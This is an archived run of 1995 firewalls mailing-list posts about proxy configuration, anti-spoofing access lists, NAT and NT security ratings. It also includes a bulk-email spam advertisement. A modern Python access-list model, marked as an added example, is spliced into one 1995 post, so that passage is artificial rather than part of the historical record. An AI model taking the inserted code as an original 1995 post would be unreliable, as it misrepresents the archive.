Wil> administrator who fancies himself a NETSEC expert because he
Wil> can transmit bytes to the same forum as the Big Boys.

  No, these are the thoughts from someone who has 4 job titles, works in the
  real world, and has over 16 very satisfied customers who are very pleased
  with the performance and security of their firewalls.

  We don't pretend to be able to make the world's computer network a safe
  place.  Only safer.

  Below's quote is indeed a bit paradoxical; nonetheless, it is true.  When I
  say they are required knowledge, I mean that I know that a system is safe
  _enough_.  As well, we could focus on the smaller component of firewall
  theory, that being that the host on which the network separation mechanism
  runs must be secure.  However, I am comfortable with the safety of my
  platforms, and feel that the study of the OSes' hardness should take place
  over in Bugtraq.

.........
Wilner@DOCKMASTER.NCSC.MIL is rumored to have said:
]
]
] Hannan writes:
]
] > True, both of these [high-assurance trusted platforms or
] > formal modeling of TCP/IP protocols] are required knowledge
] > for firewalling, and also subsets of firewall theory.
]
] My learned colleague's assertion speaks for itself.
]
]

-- 
Alan Hannan                  http://www.mid.net/~alan          402/472-0239
Network Systems/Security Administrator                         MIDnet, Inc.
From firewalls-owner Mon Oct 9 22:31:54 1995
Date: Tue, 10 Oct 1995 12:37:47 +0800 (MYT)
From: Tham Huei Hwan
Subject: TIS 1.3 tn-gw configuration
To: firewalls
Cc: tis_user

Recently, I have installed and configured tis 1.3 on my server.  When I try
to telnet to this host, it gives me the following messages:

    nicky% telnet netra
    Trying 192.9.201.80 ...
    Connected to netra.
    Escape character is '^]'.
    netra telnet proxy (Version V1.3) ready:
    Lost connection to authentication server
    Connection closed by foreign host.

Does someone have any idea what is going wrong in my configuration?
From firewalls-owner Mon Oct 9 22:47:14 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA04416 for firewalls-outgoing; Mon, 9 Oct 1995 22:41:45 -0700 Received: from aspensys (aspensys.aspensys.com [198.77.70.104]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA21470 for ; Mon, 9 Oct 1995 12:56:06 -0700 Received: from smtpinet.aspensys.com by aspensys (5.0/SMI-SVR4) id AA29456; Mon, 9 Oct 1995 15:50:39 +0500 Received: from ccMail by smtpinet.aspensys.com (SMTPLINK V2.10.08) id AA813279671; Mon, 09 Oct 95 15:58:37 EST Date: Mon, 09 Oct 95 15:58:37 EST From: "Jim Meritt" Message-Id: <9509098132.AA813279671@smtpinet.aspensys.com> To: firewalls@greatcircle.com Subject: tcp_wrapper banner example content-length: 230 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Does anyone have an example of what the banner rule looks like for tcp_wrapper (for in the .etc.hosts.deny) for people to read when they get refused connection? How about wu-ftp? 
Jim Meritt From firewalls-owner Tue Oct 10 02:12:42 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA08965 for firewalls-outgoing; Tue, 10 Oct 1995 02:07:53 -0700 Received: from blackice (blackice.winternet.com [198.174.169.7]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id CAA08958 for ; Tue, 10 Oct 1995 02:07:48 -0700 Received: (from root@localhost) by blackice (8.6.12/8.6.12) id EAA20402; Tue, 10 Oct 1995 04:05:51 -0500 Received: from relay2.UU.NET (relay2.UU.NET [192.48.96.7]) by blackice (8.6.12/8.6.12) with ESMTP id RAA24031 for ; Mon, 9 Oct 1995 17:07:44 -0500 Posted-Date: Mon, 9 Oct 1995 17:07:44 -0500 Received: from miles.greatcircle.com by relay2.UU.NET with ESMTP id QQzktj25773; Mon, 9 Oct 1995 17:57:38 -0400 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA23939 for firewalls-outgoing; Mon, 9 Oct 1995 14:18:38 -0700 Received: from bramber.windsor.com (bramber.windsor.com [199.181.96.54]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA23932 for ; Mon, 9 Oct 1995 14:18:35 -0700 Received: (from erics@localhost) by bramber.windsor.com (8.6.12/8.6.12) id RAA03630; Mon, 9 Oct 1995 17:17:12 -0400 From: "Eric V. Smith" Message-Id: <199510092117.RAA03630@bramber.windsor.com> Subject: Re: Network Address Translation stuff To: paul@vix.com (Paul A Vixie) Date: Mon, 9 Oct 1995 17:17:12 -0400 (EDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <9510091912.AA30560@wisdom.home.vix.com> from "Paul A Vixie" at Oct 9, 95 12:12:55 pm Reply-To: EricSmith@windsor.com X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 832 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Paul A Vixie wrote: > > > Doesn't this assume that the smart DNS server knows which of these > > protocols is being requested for each address, so that it knows which > > proxy to start up on the socket it created? Or am I missing something? 
> > yes, or it requires a kernel with a preemptive icmp socket. Sorry, I didn't make my question obvious. How does the DNS server know if a request for the name foo.bar.com is for FTP, telnet, finger, or whatever? I assume it could tell SMTP by an MX request, but what about the others? -- Eric V. Smith | Some for renown on scraps of learning dote, EricSmith@windsor.com | And think they grow immortal as they quote. Windsor Software Corp +----------------------------------+ Edward Young http://www.windsor.com/ Windows NT, Unix, SQL Server | English poet From firewalls-owner Tue Oct 10 02:30:03 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA09147 for firewalls-outgoing; Tue, 10 Oct 1995 02:24:40 -0700 Received: from hydra.dra.hmg.gb (hydra.dra.hmg.gb [192.5.29.32]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id CAA09137 for ; Tue, 10 Oct 1995 02:24:35 -0700 Message-Id: <199510100924.CAA09137@miles.greatcircle.com> Received: from woodpc.dra.hmg.gb by hydra.dra.hmg.gb with SMTP ; Tue, 10 Oct 95 10:20:42 GMT X-Sender: jwood@hydra.dra.hmg.gb X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 10 Oct 1995 10:20:33 +0100 To: bell@mail06.mitre.org (D. Elliott Bell), firewalls@GreatCircle.COM From: jwood@hydra.dra.hmg.gb (John Wood) Subject: Re: B2 rated WIndows NT? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 11:34 09/10/95 -0400, D. Elliott Bell wrote: >Windows NT received its B1 rating late this summer. Not B2. > Surely not?? To get a B rating, Windows NT would have to support labels. Could you please quote your evidence for this statement? I believe that C2 was the rating achieved. 
John From firewalls-owner Tue Oct 10 02:42:37 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA09046 for firewalls-outgoing; Tue, 10 Oct 1995 02:16:03 -0700 Received: from gateway.mdf.com (gateway.mdf.com [194.64.29.162]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id CAA09039 for ; Tue, 10 Oct 1995 02:15:56 -0700 Received: from asterix.logsoft.mdf.com (asterix.logsoft.mdf.com [145.230.24.94]) by gateway.mdf.com (8.6.11/8.6.9) with ESMTP id KAA07188; Tue, 10 Oct 1995 10:10:05 +0100 Received: (from dw@localhost) by asterix.logsoft.mdf.com (8.6.11/8.6.9) id JAA06955; Tue, 10 Oct 1995 09:57:59 +0100 From: David Wasser Message-Id: <199510100857.JAA06955@asterix.logsoft.mdf.com> Subject: Re: FWTK ftp-gw, http-gw under Linux To: Firewalls@GreatCircle.COM Date: Tue, 10 Oct 1995 09:57:58 +0100 (MET) Cc: ghume@cybergraphic.com.au In-Reply-To: <199510082031.NAA21070@miles.greatcircle.com> from "firewalls-digest-owner@GreatCircle.COM" at Oct 8, 95 01:31:07 pm X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Content-Length: 1682 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Greg Hume screamed for help with the following problem: > > Hi all, > > We are at his moment attempting to find the cause to a problem with > FWTK 1.3. The FTP-GW and HTTP-GW are the services we have configured > so far. Each time we start the service by connecting to the > server/firewall we are getting "Statically Linked" messages. The > messages appear in the log files and on telnet sessions when we telnet > to the gw service ports. We think it may be an environment problem but > cannot pin it down. > > The authsvr has successfully been compiled with linking forced to be > dynamic or static. The gw apps appear work fine in debug mode. > > Any help/advise would be welcome. I really don't wish to scrog the hd > and rebuild from aaaaaAAARGH. 
> The problem is not in ftp-gw or http-gw. The problem is in your inetd.conf. The sample inetd.conf from TIS doesn't work under Linux (I don't know why). The inetd is not setting up the argv/argc properly when it calls ftp-gw and this causes ftp-gw to hiccup. All you hafta do is add the name of the executable to the end of the configuration line in inetd.conf, which gets passed to ftp-gw as argv[0]. Like this: ftp stream tcp nowait root /usr/sbin/ftp-gw /usr/sbin/ftp-gw # ^^^^^^^^^^^^^^^^ # this gets passed to ftp-gw as argv[0] Substitute whatever directory you use for /usr/sbin. I fought almost half a day with this one. Thought I had really messed up! -DWass Mannesmann Demag Foerdertechnik Offenbach, Germany From firewalls-owner Tue Oct 10 04:12:43 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA11496 for firewalls-outgoing; Tue, 10 Oct 1995 04:02:38 -0700 Received: from nahanni.BouletFermat.ab.ca (dboulet.ccinet.ab.ca [198.161.96.245]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id EAA11489 for ; Tue, 10 Oct 1995 04:02:32 -0700 Received: (from danny@localhost) by nahanni.BouletFermat.ab.ca (8.6.9/8.6.9) id FAA26280 for firewalls@greatcircle.com; Tue, 10 Oct 1995 05:04:39 -0600 Date: Tue, 10 Oct 1995 05:04:39 -0600 From: Danny Boulet Message-Id: <199510101104.FAA26280@nahanni.BouletFermat.ab.ca> To: firewalls@greatcircle.com Subject: Typo in "where to get ipfirewall" description . . . Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The ftp URL's in my recent note on ipfirewall v2.0d are wrong. The correct URL's are: ftp://ftp.nebulus.net/pub/bsdi/security/ipfirewall_v2.0d.shar.gz ftp://ftp.bsdi.com/contrib/networking/security/ipfirewall_v2.0d.shar.gz Sigh! 
-Danny From firewalls-owner Tue Oct 10 04:30:09 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA11604 for firewalls-outgoing; Tue, 10 Oct 1995 04:11:57 -0700 Received: from telemann.inoc.dl.nec.com (telemann.inoc.dl.nec.com [143.101.112.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id EAA11597 for ; Tue, 10 Oct 1995 04:11:53 -0700 Received: by telemann.inoc.dl.nec.com (8.6.12/YDL1.9.1-940729.15) id GAA08829(telemann.inoc.dl.nec.com); Tue, 10 Oct 1995 06:09:59 -0500 Received: by texas.syl.dl.nec.com (8.6.12/YDL1.9.1-940729.15) id GAA21419(texas.syl.dl.nec.com); Tue, 10 Oct 1995 06:09:57 -0500 To: firewalls@GreatCircle.com Date: Mon, 09 Oct 1995 04:15:12 +0100 From: SpAmKiNg@free.org (SpamKing_Low_Cost_Bulk_E_Mail) Message-ID: Organization: SpAmKiNg Has Low Cost Bulk E Mail Rates! (505) 821-1945 Path: syl.dl.nec.com!vivaldi.inoc.dl.nec.com!seas.smu.edu!news01.aud.alcatel.com!gatech!news.mathworks.com!newsfeed.internetmci.com!EU.net!Germany.EU.net!informatik.tu-muenchen.de!lrz-muenchen.de!news.informatik.uni-muenchen.de!news.muc.de!mystery.muc.de!newsgate Subject: WE THE PEOPLE "....want the facts to make informed intelligent decisions" Newsgroups: muc.lists.netbsd.portable-ppp,muc.lists.netbsd.ports,muc.lists.netbsd.source-changes,muc.lists.netbsd.tech.install,muc.lists.netbsd.tech.kern,muc.lists.netbsd.tech.misc,muc.lists.netbsd.tech.net,muc.lists.netbsd.tech.ports,muc.lists.netbsd.tech.userlevel,muc.lists.netbsd.users,muc.lists.ntk,muc.lists.osf-managers,muc.lists.soziologie,muc.market,muc.misc,muc.rec,muc.verkehr,mucev.lists.asus-boards,nbg.general,nctu.ac.general,nctu.adm.alumni-center,ne.config,ne.general.selected,ne.internet.services,ne.jobs.contract,ne.transportation,ne.weather,necus.internet.announce,necus.internet.mirror.big-linux,necus.internet.mirror.firewalls,news.admin.hierarchies,news.admin.misc Sender: firewalls-owner@GreatCircle.COM Precedence: bulk WE THE PEOPLE "....want the facts to make 
informed intelligent decisions" "If members of our society were empowered to make their own decisions...then the whole rationale for the agency would cease to exist."- Dr. David Kessler, - Food & Drug Administration "Commissioner" Our focus for the upcoming political races is the preservation of the 1st amendment of the constitutional "Bill of Rights". The fact that you can freely read this letter is due to the 1st amendment. Some people in our government feel that we need to be regulated in the way we use this forum to gather & share information. We need this forum so that all points of view can be shared freely without threat of persecution........Remember Ruby Ridge, Waco.... The future of our country is a stake. Seek out and elect local, state & federal officials who will uphold your right to freely gather and disperse information in all or any forms be they electronic written or otherwise. Amendment 1 Congress shall make no law respecting an establishment of religion, or prohibiting the free exercise thereof; or abridging the freedom of speech, or of the press, or the right of the people peaceably to assemble, and to petition the Government for a redress of grievances. Did the founding fathers intend for us to be enslaved in regulatory law ? NO! If you share in the belief that the founding fathers never intended that we should be at the mercy of government to decide if we are able to handle the responsibility of making informed intelligent decisions, then seek out candidates who will promise to uphold our constitutional rights, support those candidates that promise to vote against any legislation that infringes on the 1st amendment rights of any citizen of this great country. The future freedom of all people rest in the actions we will take now. "Independent" candidates who seek our support please submit your agenda to us at the address below. A nice size bumper sticker with a flattering picture of "Commissioner " Kessler with his famed quote, "If members..." 
is available. Send $10.00 for (2) including p&h, to our address below (share one with a friend). If you would like to support our work please send two dollars to:

"We The People"
5505 Connecticut Ave. NW
Suite 245
Washington, DC 20015-2601

-- PLEASE RESPOND DIRECTLY TO THE ADVERTISER. THIS MESSAGE BROUGHT TO YOU BY THE SpAmKiNg

Call SpAmKiNg for the BEST BULK-E MAIL RATES! You can now reach over 6 MILLION + Internet subscribers for a low cost of $425.00. (I will post your message to 2.5 MILLION GOOD E-MAIL ADDRESSES, minimum of 9500 + USENET NEWS GROUPS AND 1400 LIST SERVE MAILING LISTS) Satisfaction IS Guaranteed! ASK about my Special Monthly, Bi Monthly, and Weekly rates. **SPECIAL RATES TO 501 C 3 NON PROFITS.** Call the SpAmKiNg at (505) 821-1945 voice mail. Please leave your NAME, ADDRESS & PHONE NUMBER. I will return your call. Sorry, incomplete information will not receive a response.

From firewalls-owner Tue Oct 10 05:12:39 1995
Date: Tue, 10 Oct 1995 14:10:16 +0200 (EET)
From: Sergey Zhuk
To: Firewalls@GreatCircle.COM
Subject: IP seq. number attacks
In-Reply-To: <199510091902.MAA19122@miles.greatcircle.com>

hi

i'm using extended access list filters on external interfaces to prevent subj. But it's still one problem: if you have addr. from _your_ subnet addr. on remote end (your providers' router) you should permit packets from this address, which are coming from external (for your network) interface. This is true at least when i'm exchanging routing information with that host:

    LAN ----|I1   R1   I2|-------- R external ------ Internet

    R1 - router for my site
    R external - router of my provider
    I1 - internal (LAN) interface
    I2 - external interface.

Suppose I2 has IP addr: xx.xx.xx.128 netmask 255.255.255.224 and I2 on R external has IP addr: xx.xx.xx.129 netmask 255.255.255.224, I1 has IP addr: xx.xx.xx.69 netmask 255.255.255.224. So i have different subnets of network xx.xx.xx.0, assigned to diff. interfaces. I can prevent incoming packets from R external with source address xx.xx.xx.0 0.0.0.255 any but i should permit xx.xx.xx.129 0.0.0.0 thus permitting subj. from at least one address. Sure that's better than subj from any of 254 addresses, but what a hell ;). Any suggestions ?

Another thing: ICMP redirects, whom i can trust and how to setup properly access list for this. I've found at least 3 types of ICMP redirects mentioned in CISCO docs...
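An added example (not from serge's post, nor any vendor's code) that models the inbound list on I2 in Python and narrows the provider-router exception to routing updates addressed to the router itself, so a packet forged with the .129 source no longer reaches the LAN; it also drops inbound ICMP redirects outright. The 192.0.2.0/24 addresses stand in for the post's xx.xx.xx.0, and RIP on UDP port 520 is an assumed routing protocol (the post does not name one).

```python
"""Model of an inbound access list on the external interface I2.

Assumed topology (documentation prefix in place of the post's xx.xx.xx.0):
LAN 192.0.2.64/27 with I1 = .69, link 192.0.2.128/27 with I2 = .128 and
the provider's router at .129. RIP (UDP 520) is assumed as the routing
protocol exchanged with the provider's router."""

import ipaddress
from dataclasses import dataclass
from typing import Optional

ANY = ("0.0.0.0", "255.255.255.255")   # IOS-style "any": base + wildcard
HOST = "0.0.0.0"                       # wildcard that matches one host
OUR_NET = ("192.0.2.0", "0.0.0.255")   # every address we own


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    proto: str             # "tcp", "udp" or "icmp"
    dport: int = 0         # tcp/udp destination port
    icmp_type: int = -1    # icmp message type


@dataclass(frozen=True)
class Rule:
    action: str            # "permit" or "deny"
    proto: str             # "ip" matches every protocol
    src: str
    src_wild: str
    dst: str
    dst_wild: str
    dport: Optional[int] = None
    icmp_type: Optional[int] = None


def wildcard_match(addr: str, base: str, wild: str) -> bool:
    """IOS wildcard semantics: a 1 bit in the mask means 'don't care'."""
    a = int(ipaddress.IPv4Address(addr))
    b = int(ipaddress.IPv4Address(base))
    w = int(ipaddress.IPv4Address(wild))
    return (a | w) == (b | w)


def rule_matches(rule: Rule, pkt: Packet) -> bool:
    if rule.proto != "ip" and rule.proto != pkt.proto:
        return False
    if not wildcard_match(pkt.src, rule.src, rule.src_wild):
        return False
    if not wildcard_match(pkt.dst, rule.dst, rule.dst_wild):
        return False
    if rule.dport is not None and rule.dport != pkt.dport:
        return False
    if rule.icmp_type is not None and rule.icmp_type != pkt.icmp_type:
        return False
    return True


def evaluate(acl: list, pkt: Packet) -> str:
    """First matching rule wins; the list ends in an implicit deny."""
    for rule in acl:
        if rule_matches(rule, pkt):
            return rule.action
    return "deny"


# The list from the post: .129 is permitted for everything, so a packet
# forged with that source address still gets through to the LAN.
LOOSE_ACL = [
    Rule("permit", "ip", "192.0.2.129", HOST, *ANY),
    Rule("deny", "ip", *OUR_NET, *ANY),
    Rule("permit", "ip", *ANY, *ANY),
]

# Narrowed: the exception covers only routing updates sent to I2 itself;
# anything else claiming one of our addresses is dropped, and ICMP
# redirects (type 5) arriving from outside are refused.
TIGHT_ACL = [
    Rule("permit", "udp", "192.0.2.129", HOST, "192.0.2.128", HOST, dport=520),
    Rule("deny", "icmp", *ANY, *ANY, icmp_type=5),
    Rule("deny", "ip", *OUR_NET, *ANY),
    Rule("permit", "ip", *ANY, *ANY),
]

# Constructed sample traffic arriving on the external interface I2.
RIP_UPDATE = Packet("192.0.2.129", "192.0.2.128", "udp", dport=520)
FORGED_FROM_ROUTER = Packet("192.0.2.129", "192.0.2.69", "tcp", dport=25)
FORGED_FROM_LAN = Packet("192.0.2.70", "192.0.2.69", "tcp", dport=25)
OUTSIDE_REDIRECT = Packet("198.51.100.1", "192.0.2.69", "icmp", icmp_type=5)
ORDINARY_MAIL = Packet("198.51.100.1", "192.0.2.69", "tcp", dport=25)


def compare(pkt: Packet) -> tuple:
    """Return (loose verdict, tight verdict) for one inbound packet."""
    return evaluate(LOOSE_ACL, pkt), evaluate(TIGHT_ACL, pkt)


if __name__ == "__main__":
    samples = [("RIP update", RIP_UPDATE), ("forged .129", FORGED_FROM_ROUTER),
               ("forged LAN", FORGED_FROM_LAN), ("redirect", OUTSIDE_REDIRECT),
               ("ordinary mail", ORDINARY_MAIL)]
    for name, pkt in samples:
        loose, tight = compare(pkt)
        print(f"{name:14s} loose={loose:7s} tight={tight}")
```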
rgds,
serge
--
+-------------------------------------+-------------------------------------+
| Sergey Zhuk                         | serge@freenet.kiev.ua               |
| UN Internet Project                 | +380-44-228-6393                    |
| System and Network Administrator    | www.freenet.kiev.ua, www.un.kiev.ua |
+-------------------------------------+-------------------------------------+

From firewalls-owner Tue Oct 10 05:43:18 1995
Message-Id: <199510101231.FAA14205@miles.greatcircle.com>
Date: Tue, 10 Oct 1995 08:28:47 -0400
From: gary flynn
To: firewalls-owner@GreatCircle.COM, firewalls@GreatCircle.COM
Subject: Re: Oracle <-> Firewall

> From: David Schnardthorst
> Subject: Oracle <-> Firewall
>
> Does anybody know of a way to get Oracle Information through a Firewall?
>
> We are setting up a firewall, with our Web Servers on the outside, however
> we need to pass some information from an Oracle Database through the firewall
> to the outside Web Servers.
>
> Has anybody done this, and if so, could you please give me some ideas of
> how to accomplish this.
>

I asked this about a month ago and haven't summarized so I'll do so now.

There is no proxy version of SQLnet or its overlying applications. Everyone is using a pass-thru filter like TIS's FWTK plug-gw or a filtering router to pass SQLnet. Five or six people gave me the same answer.

There are probably two ways to do a SQLnet proxy. The first would be to build a lot of intelligence into the proxy itself that could understand what actions on what databases by what user were being requested. The second would be to provide an API to SQLnet based applications that allowed for things like querying for authentication information. In either case, Oracle would have to do it and the second case would involve modification of lots of applications. Just idle speculation on my part :-)

From firewalls-owner Tue Oct 10 07:09:39 1995
Date: Tue, 10 Oct 95 09:59:26 EST
From: "Jim Meritt"
Message-Id: <9509108133.AA813344403@smtpinet.aspensys.com>
To: firewalls@greatcircle.com
Subject: rje on port 77

What is it and do I need/want it or should I zap it? I was looking in the /etc/services and it is new to me.

Jim Meritt

From firewalls-owner Tue Oct 10 07:15:18 1995
Message-Id: <199510101345.GAA15953@miles.greatcircle.com>
From: Darren Reed
Subject: Private insecure networks...
To: Firewalls@GreatCircle.COM (Firewalls Mailing List)
Date: Tue, 10 Oct 1995 23:42:45 +1000 (EST)

Whilst not directly relevant to firewalls, I feel that people here should be aware of this, if they're not already.

An article in a local paper today described the local Telco's desire to set up a "private" international version of the Internet, for business only. It is currently known as "Netware Connect Services" (NCS). It is aimed at carrying IPX, IP and using Novell's NDS as a directory service. The security will be provided by Netware's access control system. You may have to enter up to three passwords to get into an area described as being "highly secure". The local company (Telstra) is joining with Japan's NTT, Unisource (Europe), AT&T and Deutsche Telekom.

This scares me a lot. If what I read is true, then it shows total ignorance of the problems being faced by the Internet and the assumption that if we go somewhere else, the problems won't follow us. I hope that they all realise that the need to construct and maintain a firewall connection to this network is just as important, if not more (their competitors as well as partners are here too!). That is unless Netware use Kerberos style network authentication or one time passwords as part of the standard operating system login, when done over the network..

Does anyone have any more details ? Is this just more newspaper trash ?

darren

From firewalls-owner Tue Oct 10 07:30:32 1995
Date: Tue, 10 Oct 95 10:15:57 EST
From: "Dave Druitt"
Message-Id: <9509108133.AA813345584@GWFX1.sysorex.com>
To: firewalls@GreatCircle.com, SpAmKiNg@free.org (SpamKing_Low_Cost_Bulk_E_Mail)
Subject: Re: WE THE PEOPLE "....want the facts to make informed intel

Spam mistakenly wrote:
>Subject: WE THE PEOPLE "....want the facts to make informed intellige
>Author: SpAmKiNg@free.org (SpamKing_Low_Cost_Bulk_E_Mail) at GWFX1
>Date: 10/10/95 7:44 AM

If I had any interest in this cause before, I lost it with this intrusive invasion of my privacy.

Dave Druitt
________________________
'Let's be free of all influences, good and bad. Then we can make up our own minds...'
ANONYMOUS

From firewalls-owner Tue Oct 10 08:45:25 1995
Date: Tue, 10 Oct 1995 10:29:19 -0500 (CDT)
From: Doug Hughes
To: Jim Meritt
Cc: firewalls@GreatCircle.COM
Subject: Re: rje on port 77
In-Reply-To: <9509108133.AA813344403@smtpinet.aspensys.com>

On Tue, 10 Oct 1995, Jim Meritt wrote:
> What is it and do I need/want it or should I zap it? I was looking in
> the /etc/services and it is new to me.
>
> Jim Meritt
>

Either zap it or put a trap on it. I put a trap on mine that alerts me if a foreign host tries to access it. See http://www.eng.auburn.edu/users/doug/second.html for details.

____________________________________________________________________________
Doug Hughes                         Engineering Network Services
System/Net Admin                    Auburn University
doug@eng.auburn.edu                 Apple T-shirt on Win95 - "Been there, done that"

From firewalls-owner Tue Oct 10 09:47:52 1995
Date: Tue, 10 Oct 1995 09:33:53 -0800
To: firewalls@GreatCircle.com
From: Brent@GreatCircle.COM (Brent Chapman)
Subject: Re: WE THE PEOPLE "....want the facts to make informed intel
Cc: mcb@GreatCircle.COM

Spam mistakenly wrote:
>Subject: WE THE PEOPLE "....want the facts to make informed intellige
>Author: SpAmKiNg@free.org (SpamKing_Low_Cost_Bulk_E_Mail) at GWFX1
>Date: 10/10/95 7:44 AM

Folks, the best way to deal with spam on a mailing list is to bring it to the attention of the list management (believe me, we know about this one already), and then ignore it. Don't give them any followups; it only draws more attention to their BS.
-Brent

--
Brent Chapman         | Great Circle Associates | For Firewalls Tutorial info:
Brent@GreatCircle.COM | 1057 West Dana Street   | Tutorial-Info@GreatCircle.COM
+1 415 962 0841       | Mountain View, CA 94041 | http://www.greatcircle.com

From firewalls-owner Tue Oct 10 10:01:02 1995
Message-Id: <199510101634.LAA23133@intex.intex.net>
Date: Tue, 10 Oct 1995 11:34:05 -0500
To: Dana Brewer , Danny Boulet
From: lpierce@intex.net (S. Lane Pierce)
Subject: Re: Firewall on RS/6K
Cc: firewalls@GreatCircle.COM

At 02:03 PM 10/9/95 -0500, Dana Brewer wrote:
>We're looking into installing a "firewall" on our RS/6k. We don't have
>the budget to buy any of the software packages that I see mentioned on
>this list. What are some of the things that we can do cheaply (free is
>even better) to make the machine more secure?
[.sig snipped]

First and foremost, contact IBM for a complete list of patches (esp. those related to security) and apply them. Secondly, disable network services you do not require. And thirdly, evaluate your host based security. Obtain and run crack, cops, satan, etc. and respond to the information they generate.

To build your firewall, look into FWTK from Trusted Information Systems; URL=ftp://ftp.tis.com/pub/firewalls/toolkit

PS: All of this is free! :)

Best Regards,
S. Lane Pierce
lpierce@intex.net

From firewalls-owner Tue Oct 10 10:22:21 1995
Date: Tue, 10 Oct 1995 12:48:35 -0400
From: chen@summitec.com (Arthur Chen)
Message-Id: <9510101648.AA02835@sun1>
To: firewalls@greatcircle.com, Tham.Huei.Hwan@bass.com.my
Subject: Re: TIS 1.3 tn-gw configuration
Cc: fwtk-users@TIS.COM

Check to see if you have properly added an entry for authsrv in the inetd.conf and services files. They are both under /etc.

Arthur Chen
chen@summitec.com

From firewalls-owner Tue Oct 10 10:51:23 1995
Date: Tue, 10 Oct 1995 09:47:05 -0700
From: Doug Kaye
To: avalon@coombs.anu.edu.au, Firewalls@GreatCircle.COM
Subject: Private insecure networks... -Reply

It's real, Darren. Here in the states it's slated for rollout the first quarter of 1996. I think the big push is for IPX rather than IP, but that may have shifted. As your sources mentioned, it's all based upon NDS.
NetWare today supports a number of token-based and one-time password schemes, and as you say, I would hope users of this net will plan on using them.

...doug
============================================================
Doug Kaye
Rational Data Systems, Novato, CA
Tel: 415-382-8400   FAX: 415-382-8441
http://www.rds.com

>>> Darren Reed 10/10/95 06:42am >>>
An article in a local paper today described the local Telco's desire to set up a "private" international version of the Internet, for business only. It is currently known as "Netware Connect Services" (NCS).

Does anyone have any more details ? Is this just more newspaper trash ?

From firewalls-owner Tue Oct 10 11:10:04 1995
Date: Tue, 10 Oct 1995 13:47:13 -0400 (EDT)
From: "A. Padgett Peterson, P.E. Information Security"
To: firewalls@greatcircle.com
Message-Id: <951010134713.21056023@hobbes.orl.mmc.com>
Subject: Windows NT

At the NIST/NSA/NCSC conference it was announced that Windows NT has met C2 requirements and may display the logo on its packages. The "Administrator's Security Guide" lists configurations for Compaq ProLiant 2000 & 4000 & DECpc AXP/150. *None* of the configurations include a network interface card (am assured that that will be included RSN (4-6 months est.)). Of course *today* adding any peripheral invalidates the certification so you can use NT to set up a C2 compliant server. Just don't connect it to a network.

Warmly,
Padgett

From firewalls-owner Tue Oct 10 11:32:39 1995
Date: Tue, 10 Oct 1995 11:25:46 -0700
Message-Id: <199510101825.LAA08285@translation.com>
To: Paul A Vixie , firewalls@GreatCircle.COM
From: Andrew Foss
Subject: Re: Network Address Translation stuff

>Assume that the name server is smart enough to answer "creatively" when asked
>certain questions by internal hosts about external hosts. The border gateway

This is generally referred to as DNS spoofing, not network address translation. DNS spoofing does save many people a lot of socks and proxy admin work, but it is not true address translation.

andrew

Andrew Foss                  Tel. 415/494-NETS(6387)
Network Translation Inc.     Dir. 415/855-0725
1901 Embarcadero Rd.
FAX 415/424-9110
Palo Alto, CA 94303
email afoss@translation.com
web www.translation.com

From firewalls-owner Tue Oct 10 11:42:55 1995
Date: Tue, 10 Oct 1995 11:38:05 -0700
Message-Id: <199510101838.LAA19278@ix2.ix.netcom.com>
From: raberry2@ix.netcom.com (Ron Berry )
Subject: International Encryption Protocols (RC2) or (IDEA)
To: firewalls@greatcircle.com

During recent firewall presentations discussions were introduced regarding encryption algorithms for E:mail and other messaging. We discussed RSA and DES, which are standards accepted by the organization I work for. In addition several business units have defined requirements where E:mail correspondence will be used on an international basis. One vendor supports RC2 for the standard international encryption algorithm. I know little about RC2 and was hoping someone could shed some light on this for me. What is the definition of the acronym; What key length is it based on; Who or what organization is responsible for it (who designed it); is it widely used???

Thanks....Ron

From firewalls-owner Tue Oct 10 12:00:13 1995
From: "Bryan D. Boyle"
Message-Id: <9510101449.ZM7571@maverick.erenj.com>
Date: Tue, 10 Oct 1995 14:49:58 -0400
In-Reply-To: "A. Padgett Peterson, P.E. Information Security" "Windows NT" (Oct 10, 1:47pm)
References: <951010134713.21056023@hobbes.orl.mmc.com>
To: "A. Padgett Peterson, P.E. Information Security"
Subject: Re: Windows NT
Cc: firewalls@greatcircle.com

On Oct 10, 1:47pm, A. Padgett Peterson, P.E. Information Security wrote:
*****deletia******
> *None* of the configurations include a network interface card (am assured
> that that will be included RSN (4-6 months est.)). Of course *today* adding
> any peripheral invalidates the certification so you can use NT to set up a
> C2 compliant server. Just don't connect it to a network.

hey, if you don't connect any server to a network, it will be secure. Usefulness, however, is another kettle of fish...:)

--
Bryan D. Boyle | EMAIL: bdboyle@erenj.com
908-730-3338   | PAGE: bboyle@apt1.pagemart.com
#include       | http://www.access.digex.net/~bdboyle/index.html

"It seems that 'national security' is the root password to the Constitution. As with any dishonest superuser, the best countermeasure is strong encryption." -Phil Karn

From firewalls-owner Tue Oct 10 12:31:38 1995
From: "Greg King (Exchange)"
